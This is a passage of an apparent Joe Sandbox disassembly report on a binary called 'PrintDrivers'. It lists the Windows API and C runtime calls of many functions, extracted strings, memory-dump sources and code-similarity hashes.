                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 005A5EB3
                                                                    • _ValidateLocalCookies.LIBCMT ref: 005A5F08
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                    • String ID: csm
                                                                    • API String ID: 1170836740-1018135373
                                                                    • Opcode ID: 1a6c894bd9d539def4703111703b8dc0b3619c5deddde564099488a9f2fe91de
                                                                    • Instruction ID: 15415244ad3698b03ce1b8edd1bf781015d000cfd6f635149cf99e6384f60cc1
                                                                    • Opcode Fuzzy Hash: 1a6c894bd9d539def4703111703b8dc0b3619c5deddde564099488a9f2fe91de
                                                                    • Instruction Fuzzy Hash: ED417F34A006099FCF10DF68C889E9EBFB9BF46314F148196E9159B392E731AE15CB91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: api-ms-$ext-ms-
                                                                    • API String ID: 0-537541572
                                                                    • Opcode ID: 8c33d5cd1d29f01866dd844a9382ad40d6eaae4af39f1403cbc01284b585fd37
                                                                    • Instruction ID: ea9a4293970bebc6429ff05467502e6a66f54eb4e51ae2dcfff03d725877e14b
                                                                    • Opcode Fuzzy Hash: 8c33d5cd1d29f01866dd844a9382ad40d6eaae4af39f1403cbc01284b585fd37
                                                                    • Instruction Fuzzy Hash: 2821D835A01629ABCB316A249C4DEBA7F5CBF117E0F291610ED15B7291DE30FC08D5E0
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,00000000,80004005,00000008), ref: 00586CF7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast
                                                                    • String ID: > returned:$Call to ShellExecute() for verb<$Last error=$Tv]$Tv]$Tv]
                                                                    • API String ID: 1452528299-2090863832
                                                                    • Opcode ID: b343ff8fe23e83ccc406b32bc824ed3d601718f6685b088b99b1586eb13692d6
                                                                    • Instruction ID: 5bcd73d1710570c6abbde9851edbadbb70231ae841f5db847fc44b394f46e6e7
                                                                    • Opcode Fuzzy Hash: b343ff8fe23e83ccc406b32bc824ed3d601718f6685b088b99b1586eb13692d6
                                                                    • Instruction Fuzzy Hash: C4218159B2026287CB742F7C8405339AAE0FF58715F25186FDCC9E7391F66A8C81C395
                                                                    APIs
                                                                      • Part of subcall function 005BD9A5: _free.LIBCMT ref: 005BD9CA
                                                                    • _free.LIBCMT ref: 005BDCA7
                                                                      • Part of subcall function 005B6238: HeapFree.KERNEL32(00000000,00000000,?,005BD9CF,?,00000000,?,?,?,005BDC72,?,00000007,?,?,005BE165,?), ref: 005B624E
                                                                      • Part of subcall function 005B6238: GetLastError.KERNEL32(?,?,005BD9CF,?,00000000,?,?,?,005BDC72,?,00000007,?,?,005BE165,?,?), ref: 005B6260
                                                                    • _free.LIBCMT ref: 005BDCB2
                                                                    • _free.LIBCMT ref: 005BDCBD
                                                                    • _free.LIBCMT ref: 005BDD11
                                                                    • _free.LIBCMT ref: 005BDD1C
                                                                    • _free.LIBCMT ref: 005BDD27
                                                                    • _free.LIBCMT ref: 005BDD32
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 8b5d52fa90c217f8a7e0d971fbc3711a7d28f3fb65ca9d77dc555dd68bb7ae36
                                                                    • Instruction ID: 86c9f302be18d3e88a3ce097180a55ef6ccabd96666632de67da76aa72ba64dd
                                                                    • Opcode Fuzzy Hash: 8b5d52fa90c217f8a7e0d971fbc3711a7d28f3fb65ca9d77dc555dd68bb7ae36
                                                                    • Instruction Fuzzy Hash: 24111F72641B09BAE660B7B0CC0FFCBBFAC7F95700F404915B2996A052EB7DB5054A61
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: Maklocstr$Maklocchr
                                                                    • String ID: iw]
                                                                    • API String ID: 2020259771-3454266309
                                                                    • Opcode ID: 37e453c48d938eb93d62696751aa8c85eebb60ffd48f2b3f62bd5a732e068ef2
                                                                    • Instruction ID: e483d2d35a65782c5c936353931da672c6307a562cdd4998a8bb9a3c315de75d
                                                                    • Opcode Fuzzy Hash: 37e453c48d938eb93d62696751aa8c85eebb60ffd48f2b3f62bd5a732e068ef2
                                                                    • Instruction Fuzzy Hash: 33118FB1A00B45BFEB219BA5D845F12BBECFB44710F14091AF245CB641E274F96487A5
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(005E0D24,?,?,00582527,005E1620,005C87A0), ref: 005A4AE3
                                                                    • LeaveCriticalSection.KERNEL32(005E0D24,?,?,00582527,005E1620,005C87A0), ref: 005A4B16
                                                                    • RtlWakeAllConditionVariable.NTDLL ref: 005A4B8D
                                                                    • SetEvent.KERNEL32(?,00582527,005E1620,005C87A0), ref: 005A4B97
                                                                    • ResetEvent.KERNEL32(?,00582527,005E1620,005C87A0), ref: 005A4BA3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                                                                    • String ID: $^
                                                                    • API String ID: 3916383385-4185404816
                                                                    • Opcode ID: f1f519ee4c231b5cd6f1ddaebbdfb562f23ca95afc8e94d6c40c6b6de5fbbf7d
                                                                    • Instruction ID: 51d196608d17b7c634f99a0a45dd08f1b42a538e864d316f7e94ce58dd254e3d
                                                                    • Opcode Fuzzy Hash: f1f519ee4c231b5cd6f1ddaebbdfb562f23ca95afc8e94d6c40c6b6de5fbbf7d
                                                                    • Instruction Fuzzy Hash: F801A931502668EFCB199F98FC4CE983BA4FB19300704506AE8428B371CBB06C48EB90
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0059B1CD
                                                                    • ctype.LIBCPMT ref: 0059B214
                                                                      • Part of subcall function 0059AD34: __Getctype.LIBCPMT ref: 0059AD43
                                                                      • Part of subcall function 005960D4: __EH_prolog3.LIBCMT ref: 005960DB
                                                                      • Part of subcall function 005960D4: std::_Lockit::_Lockit.LIBCPMT ref: 005960E5
                                                                      • Part of subcall function 005960D4: std::_Lockit::~_Lockit.LIBCPMT ref: 00596156
                                                                      • Part of subcall function 00592AF7: __EH_prolog3.LIBCMT ref: 00592AFE
                                                                      • Part of subcall function 00592AF7: std::_Lockit::_Lockit.LIBCPMT ref: 00592B08
                                                                      • Part of subcall function 00592AF7: std::_Lockit::~_Lockit.LIBCPMT ref: 00592BAC
                                                                      • Part of subcall function 005961FE: __EH_prolog3.LIBCMT ref: 00596205
                                                                      • Part of subcall function 005961FE: std::_Lockit::_Lockit.LIBCPMT ref: 0059620F
                                                                      • Part of subcall function 005961FE: std::_Lockit::~_Lockit.LIBCPMT ref: 00596280
                                                                      • Part of subcall function 00592AF7: Concurrency::cancel_current_task.LIBCPMT ref: 00592BB7
                                                                      • Part of subcall function 005963BD: __EH_prolog3.LIBCMT ref: 005963C4
                                                                      • Part of subcall function 005963BD: std::_Lockit::_Lockit.LIBCPMT ref: 005963CE
                                                                      • Part of subcall function 005963BD: std::_Lockit::~_Lockit.LIBCPMT ref: 0059643F
                                                                      • Part of subcall function 00596328: __EH_prolog3.LIBCMT ref: 0059632F
                                                                      • Part of subcall function 00596328: std::_Lockit::_Lockit.LIBCPMT ref: 00596339
                                                                      • Part of subcall function 00596328: std::_Lockit::~_Lockit.LIBCPMT ref: 005963AA
                                                                    • collate.LIBCPMT ref: 0059B362
                                                                    • numpunct.LIBCPMT ref: 0059B60C
                                                                    • __Getcoll.LIBCPMT ref: 0059B3A4
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                      • Part of subcall function 00586010: LocalAlloc.KERNEL32(00000040,?,005943F0,00000020,?,?,005890A2,00000000,F3F544E4,?,?,?,?,005C6D1D,000000FF), ref: 00586016
                                                                    • codecvt.LIBCPMT ref: 0059B6CA
                                                                      • Part of subcall function 0059673B: __EH_prolog3.LIBCMT ref: 00596742
                                                                      • Part of subcall function 0059673B: std::_Lockit::_Lockit.LIBCPMT ref: 0059674C
                                                                      • Part of subcall function 0059673B: std::_Lockit::~_Lockit.LIBCPMT ref: 005967BD
                                                                      • Part of subcall function 00596865: __EH_prolog3.LIBCMT ref: 0059686C
                                                                      • Part of subcall function 00596865: std::_Lockit::_Lockit.LIBCPMT ref: 00596876
                                                                      • Part of subcall function 00596865: std::_Lockit::~_Lockit.LIBCPMT ref: 005968E7
                                                                      • Part of subcall function 00595CC1: __EH_prolog3.LIBCMT ref: 00595CC8
                                                                      • Part of subcall function 00595CC1: std::_Lockit::_Lockit.LIBCPMT ref: 00595CD2
                                                                      • Part of subcall function 00595CC1: std::_Lockit::~_Lockit.LIBCPMT ref: 00595D43
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$H_prolog3Lockit::_Lockit::~_$AllocConcurrency::cancel_current_taskGetcollGetctypeLocalcodecvtcollatectypenumpunct
                                                                    • String ID:
                                                                    • API String ID: 3494022857-0
                                                                    • Opcode ID: 08ffe9255ac5179e4b62e17322a754fc186c824c7f9473ed8c61afc26052a43d
                                                                    • Instruction ID: 14e69fd748de69387f48e0daa409f642837ed0f997631bee7fbedb2d485cb8fb
                                                                    • Opcode Fuzzy Hash: 08ffe9255ac5179e4b62e17322a754fc186c824c7f9473ed8c61afc26052a43d
                                                                    • Instruction Fuzzy Hash: BCE19171804216ABEF207F619D4EABF3EA5FF81750F14442DF84567281DBB54D10A7E2
                                                                    APIs
                                                                    • GetConsoleOutputCP.KERNEL32(00000000,00000000,?), ref: 005C2993
                                                                    • __fassign.LIBCMT ref: 005C2B78
                                                                    • __fassign.LIBCMT ref: 005C2B95
                                                                    • WriteFile.KERNEL32(?,00000010,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005C2BDD
                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 005C2C1D
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 005C2CC5
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                    • String ID:
                                                                    • API String ID: 1735259414-0
                                                                    • Opcode ID: bc224005bb14cc68adb53d599c4ad46db12e69432cd2ec6d8adf5f8b0a0a6024
                                                                    • Instruction ID: 6647b3de3a184c8a2fbea9e5187794fe39f90f48e88374e3b948f3bdbb0ecf17
                                                                    • Opcode Fuzzy Hash: bc224005bb14cc68adb53d599c4ad46db12e69432cd2ec6d8adf5f8b0a0a6024
                                                                    • Instruction Fuzzy Hash: 74C18A75D002599FCF14CFE8C884AEDBFB5BF59304F28416AE855BB242D631AD46CB60
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: __freea$__alloca_probe_16
                                                                    • String ID: a/p$am/pm
                                                                    • API String ID: 3509577899-3206640213
                                                                    • Opcode ID: e7f297e107e3922a7c18011ed40dc2c7b8bb96b82d96ae16707d58e8181017ea
                                                                    • Instruction ID: 45df135ebca8fdaa4d1be7056b9347d9d190c45b18956ea9f74d9cda0814277c
                                                                    • Opcode Fuzzy Hash: e7f297e107e3922a7c18011ed40dc2c7b8bb96b82d96ae16707d58e8181017ea
                                                                    • Instruction Fuzzy Hash: 44C1E835900A16CACFA48F68C5A5AFABFB0FF46700FA44559E403AB690D331BD41CB69
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000000,?,?,00000000,00585578), ref: 00585798
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast
                                                                    • String ID: Call to ShellExecuteEx() returned:$Last error=$Tv]$false$true
                                                                    • API String ID: 1452528299-3232076712
                                                                    • Opcode ID: 28fa5e2cc42161a48a00ce64d947a60e2adda784582e930c66cdb55b2f7973c3
                                                                    • Instruction ID: 36d946103943dee51c55a9910eeebf210d8e6cefb8d1aa02e03fe12db5c1e216
                                                                    • Opcode Fuzzy Hash: 28fa5e2cc42161a48a00ce64d947a60e2adda784582e930c66cdb55b2f7973c3
                                                                    • Instruction Fuzzy Hash: 8211CE65A1062687CB302F2C9804336AAE4FF54751F65547FDC89E7391F6B58C8183C0
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,005A7D73,005A67A0,005A542E), ref: 005A7D8A
                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 005A7D98
                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005A7DB1
                                                                    • SetLastError.KERNEL32(00000000,005A7D73,005A67A0,005A542E), ref: 005A7E03
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastValue___vcrt_
                                                                    • String ID:
                                                                    • API String ID: 3852720340-0
                                                                    • Opcode ID: 9052b9ef3d623363b0ca6dcb76fb6ebb6aaaed8bfc2cd57b7c6aa5836e80c550
                                                                    • Instruction ID: fd174ae98353488906fede0650391db288442f5f2b52b5015c055315b5e09535
                                                                    • Opcode Fuzzy Hash: 9052b9ef3d623363b0ca6dcb76fb6ebb6aaaed8bfc2cd57b7c6aa5836e80c550
                                                                    • Instruction Fuzzy Hash: 5701D43220D6179EA73527747C8EA7F2F98FF67374724423BF412562E2EE914C05A240
                                                                    APIs
                                                                    • GetTempFileNameW.KERNEL32(?,URL,00000000,?,F3F544E4), ref: 00583174
                                                                    • MoveFileW.KERNEL32(?,00000000), ref: 00583402
                                                                    • DeleteFileW.KERNEL32(?), ref: 0058344A
                                                                      • Part of subcall function 00582D40: LocalFree.KERNEL32(?,F3F544E4,?,?,005C5A40,000000FF,?,005811E2,F3F544E4,?,?,005C5A75,000000FF), ref: 00582D91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: File$DeleteFreeLocalMoveNameTemp
                                                                    • String ID: URL$url
                                                                    • API String ID: 1622375482-346267919
                                                                    • Opcode ID: eaeb6c6eb507c6d01968e0f7fbd6529bda5ab57bc252774b2719e3b54c43e4a6
                                                                    • Instruction ID: 438f572adbc05e397aa5aaa350537c4d0dff8f722b69ecca967bb2df524b2210
                                                                    • Opcode Fuzzy Hash: eaeb6c6eb507c6d01968e0f7fbd6529bda5ab57bc252774b2719e3b54c43e4a6
                                                                    • Instruction Fuzzy Hash: 13C15970914669DACB24EF28CC9CBDDBBB4BF54704F1046D9D809A7291EB74AB84CF90
                                                                    APIs
                                                                    • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 005835E5
                                                                    • GetLastError.KERNEL32(?,?,?,005C5F75,000000FF), ref: 005836CA
                                                                      • Part of subcall function 00582410: GetProcessHeap.KERNEL32 ref: 00582465
                                                                      • Part of subcall function 00583E60: FindResourceExW.KERNEL32(00000000,00000006,?,00000000,00000000,?,?,?,?,00583628,-00000010,?,?,?,005C5F75,000000FF), ref: 00583EA6
                                                                    • _wcschr.LIBVCRUNTIME ref: 00583676
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,005C5F75,000000FF), ref: 0058368B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: DirectoryErrorFindHeapLastLibraryLoadProcessResourceSystem_wcschr
                                                                    • String ID: ntdll.dll
                                                                    • API String ID: 3941625479-2227199552
                                                                    • Opcode ID: 47f57c32980bff155a2cb75729abec04e5d714d1ccd378c349ee2579b7a74fe6
                                                                    • Instruction ID: c2b6f3da91c0205e2bc4d4dad303bd54b9087987f17feef1dbe0909811f80de6
                                                                    • Opcode Fuzzy Hash: 47f57c32980bff155a2cb75729abec04e5d714d1ccd378c349ee2579b7a74fe6
                                                                    • Instruction Fuzzy Hash: 0541A471600606AFDB10EF69CC49BAEBBA4FF54710F14452AED16E7281EB70AA04CF50
                                                                    APIs
                                                                      • Part of subcall function 00581920: LocalFree.KERNEL32(?), ref: 00581942
                                                                      • Part of subcall function 005A5D0D: RaiseException.KERNEL32(E06D7363,00000001,00000003,00581AC0,?,?,005909D1,00581AC0,005DC0B0,?,00581AC0), ref: 005A5D6D
                                                                      • Part of subcall function 00582B10: LocalAlloc.KERNEL32(00000040,005DD827,005DD804,005DD804), ref: 00582B49
                                                                    • GetCurrentProcess.KERNEL32(F3F544E4,F3F544E4,?,?,00000000,005C6641,000000FF), ref: 00585FCB
                                                                      • Part of subcall function 005A4B23: EnterCriticalSection.KERNEL32(005E0D24,?,?,?,005824B6,005E1620,F3F544E4,?,?,005C5B3D,000000FF), ref: 005A4B2E
                                                                      • Part of subcall function 005A4B23: LeaveCriticalSection.KERNEL32(005E0D24,?,?,?,005824B6,005E1620,F3F544E4,?,?,005C5B3D,000000FF), ref: 005A4B6B
                                                                    • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00585F90
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00585F97
                                                                      • Part of subcall function 005A4AD9: EnterCriticalSection.KERNEL32(005E0D24,?,?,00582527,005E1620,005C87A0), ref: 005A4AE3
                                                                      • Part of subcall function 005A4AD9: LeaveCriticalSection.KERNEL32(005E0D24,?,?,00582527,005E1620,005C87A0), ref: 005A4B16
                                                                      • Part of subcall function 005A4AD9: RtlWakeAllConditionVariable.NTDLL ref: 005A4B8D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeaveLocal$AddressAllocConditionCurrentExceptionFreeHandleModuleProcProcessRaiseVariableWake
                                                                    • String ID: IsWow64Process$kernel32
                                                                    • API String ID: 591782615-3789238822
                                                                    • Opcode ID: 174adabde2e06b840aa610596f3c4fde1ff1e215d3057a0476aa5a7a6fefdb6f
                                                                    • Instruction ID: aac667dfb36d15f21884e1826be9b131824d578a2c7648f24b673b89c6951d07
                                                                    • Opcode Fuzzy Hash: 174adabde2e06b840aa610596f3c4fde1ff1e215d3057a0476aa5a7a6fefdb6f
                                                                    • Instruction Fuzzy Hash: E121F371900A85DFDB10EFA4DD4AFAD7BB8FB14710F040226E912AB690E770A904DB65
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: Mpunct$GetvalsH_prolog3
                                                                    • String ID: $+xv
                                                                    • API String ID: 2204710431-1686923651
                                                                    • Opcode ID: 71e7fe95c3ea9406c084ca6e5043c9c9413cb3c5fdb9578697c4aca3004bc746
                                                                    • Instruction ID: 3fbfc0996de4a4dce14d4c0df0c466d93e6c99f1315250dc1551e8c876452f76
                                                                    • Opcode Fuzzy Hash: 71e7fe95c3ea9406c084ca6e5043c9c9413cb3c5fdb9578697c4aca3004bc746
                                                                    • Instruction Fuzzy Hash: C82171B1504A566EDB21DF74848477BBEE8BB49300B04091AF499C7A42E734EA05CBE1
                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,005A8EE3,?,?,005E0DB4,00000000,?,005A9010,00000004,InitializeCriticalSectionEx,005CC8CC,005CC8D4,00000000), ref: 005A8EB2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
